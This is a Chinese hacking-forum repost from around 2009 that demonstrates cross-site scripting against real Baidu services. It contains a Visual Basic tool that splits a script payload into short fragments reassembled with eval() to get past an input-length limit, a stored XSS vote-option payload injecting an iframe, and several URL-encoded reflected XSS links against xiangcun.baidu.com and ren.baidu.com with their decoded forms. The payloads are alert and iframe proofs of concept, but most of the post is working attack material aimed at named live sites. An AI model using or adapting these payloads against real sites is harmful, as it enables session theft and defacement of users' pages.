（转自邪恶八进制  文章作者：woldy）

不知道转到这里合不合适，不合适就DEL了  呵呵

测试地址 http://apps.hi.baidu.com/vote/show/detail?vote_id=51268

   












===============================================
话说因为投票选项最多40个字，所以要给跨站代码转换一下，不过转换这些代码也挺费劲的，最好还是编个小程序来做~~~~~~
Private Sub Command1_Click()
a = Fix(Len(Text1.Text) / 16)
Text2.Text = "<script>z='" & Mid(Text1.Text, 1, 16) & "'</script>" & vbCrLf
For i = 2 To a
Text2.Text = Text2.Text & "<script>z=z+'" & Mid(Text1.Text, 1 + (16 * (i - 1)), 16) & "'</script>" & vbCrLf
Next
Text2.Text = Text2.Text & Chr(10) & Chr(13) & "<script>z=z+'" & Right(Text1.Text, Len(Text1.Text) Mod 16) & "'</script>" & vbCrLf
Text2.Text = Text2.Text & "<script>eval(z)</script>" & vbCrLf
Text2.Text = Text2.Text & "<script>alert('hello woldy!')</script>"
End Sub



2009-12-23 02:32

最后附上我的选项代码，祝大家圣诞快乐~~~~~~~
<script>z='document.write("'</script>
<script>z=z+'<iframe src=http'</script>
<script>z=z+'://www.163.com w'</script>
<script>z=z+'idth=666 height='</script>
<script>z=z+'666></iframe>")'</script>
<script>eval(z)</script>
<script>alert("hello woldy!")</script>
简易代码转换器下载地址：http://forum.eviloctal.com/attachment.php?aid=13930

(续)

这次主要是通过
http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url=woldy（百度全国大学生乡村信息化创新大赛）
和 http://ren.baidu.com/uquery/?type=1&fn=5&word=woldy（百度空间——找朋友）进行的跨站行为。

测试地址：

http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%2D%2D%2D%2D%2D%2D%68%65%6C%6C%6F%20%77%6F%6C%64%79%21%2D%2D%2D%2D%2D%2D%2F%29%3C%2F%73%63%72%69%70%74%3E

http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D%20%3C%2F%69%66%72%61%6D%65%3E

http://ren.baidu.com/uquery/?type=1&fn=5&word=%27%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%2D%2D%2D%2D%2D%2D%68%65%6C%6C%6F%20%77%6F%6C%64%79%21%2D%2D%2D%2D%2D%2D%2F%29%3C%2F%73%63%72%69%70%74%3E

http://ren.baidu.com/uquery/?type=1&fn=5&word=%27%3C%2F%73%63%72%69%70%74%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D%20%3C%2F%69%66%72%61%6D%65%3E
================================================================
================================================================
测试地址1
http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%2D%2D%2D%2D%2D%2D%68%65%6C%6C%6F%20%77%6F%6C%64%79%21%2D%2D%2D%2D%2D%2D%2F%29%3C%2F%73%63%72%69%70%74%3E
原型http://ren.baidu.com/uquery/?type=1&fn=5&word='<;/script><iframe src=http://www.baidu.com </iframe>



测试地址2
http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D%20%3C%2F%69%66%72%61%6D%65%3E
原型http://xiangcun.baidu.com/viewnews.php?nid=148&rtn_url="><iframe src=http://www.baidu.com </iframe>

测试地址3
http://ren.baidu.com/uquery/?type=1&fn=5&word=%27%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%2D%2D%2D%2D%2D%2D%68%65%6C%6C%6F%20%77%6F%6C%64%79%21%2D%2D%2D%2D%2D%2D%2F%29%3C%2F%73%63%72%69%70%74%3E
原型http://ren.baidu.com/uquery/?type=1&fn=5&word='</script><script>alert(/------hello woldy!------/)</script>  


测试地址4
http://ren.baidu.com/uquery/?type=1&fn=5&word=%27%3C%2F%73%63%72%69%70%74%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D%20%3C%2F%69%66%72%61%6D%65%3E
原型http://ren.baidu.com/uquery/?type=1&fn=5&word='</script><iframe src=http://www.baidu.com </iframe>


12.24号的

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)